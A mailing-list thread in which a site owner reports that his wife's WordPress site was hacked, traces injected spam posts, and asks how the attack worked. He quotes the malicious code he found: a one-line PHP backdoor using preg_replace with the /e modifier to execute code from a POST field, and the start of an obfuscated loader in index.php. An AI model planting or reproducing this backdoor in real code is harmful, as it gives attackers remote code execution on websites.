[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: my wife's website was hacked



Following my previous message, I confirmed this attack was spam related.
Once the attacker gained access to the filesystem, he added many spam posts to my wife's wordpress site. Naturally, the posts appeared as though my wife wrote them. Then the previously mentioned code built a sitemap that pointed to each of those bogus posts. 

So this was all about creating bogus links to get people to click them, which in turn, I suppose, would somehow get the attacker paid for people clicking on the ads? I'm uncertain what the benefit is exactly, but I don't have the mind of someone like this. 

It's still a mystery how exactly the attacker gained access to her site. Her passwords have been changed of course.

On Sat, Sep 8, 2018 at 7:45 PM Andrew Bauer <knight-of-ni@outlook.com> wrote:
When I woke up this morning I walked into the kitchen to see my wife sitting on the floor with her laptop, banging away on her keyboard, muttering something about her website being hacked. Uh Oh, and I have not even had my morning coffee yet.

It looks like someone did something to do with google site verification, perhaps to take ownership of the site.

Anyways, this file was placed in the web root last night:
googleXXXXXXXXXXXX.html and it contents were simply:

google-site-verification: googleXXXXXXXXXXXX.html

Since it just happened, I ssh'ed to a command line, grep'ed for all files with a modification date of Sep 8, then proceeded to compare suspicious lines of code to the source files found on github.

Further investigation revealed this was inserted into the wordpress responsive theme page.php file:
<?php @preg_replace("/[pageerror]/e",$_POST['mkf3wapa'],"saft"); ?>

This was inserted into the default wordpress index.php file:
//header('Content-Type:text/html; charset=utf-8');
$O_0O__O0O0='242';
$OO___0OO00='1';
$O_0O_00OO_='1';
$O0_O_O_O00=urldecode("a very very long string of cryptic text"]();?><?php

Seems this has got to do with a known wordpress hack:
https://gist.github.com/anttiviljami/6fc2645a2688f7b1213b4fcbc73686e8

The sitemap was modified, but the file is so large I gave up trying to find that needle in a haystack. 

My best guess is somehow someone was able to take ownership of the site through that Google verification thing then modify the content of her website.  I still don't know how that can be possible through Google, since her site is hosted by goDaddy, but I am far from an expert on hosted sites.

In any case, I told my wife to do the usual... verify she is running the latest wordpress, including any plugins. I'm not sure what else to tell her.

I'd be interested to know if anyone has heard of this kind of attack, what it does, and the best way to prevent it from happening again.


Thanks,
Andy

No Trees were killed in the sending of this message.
However, a large number of electrons were terribly inconvenienced.


--
Thanks,
Andy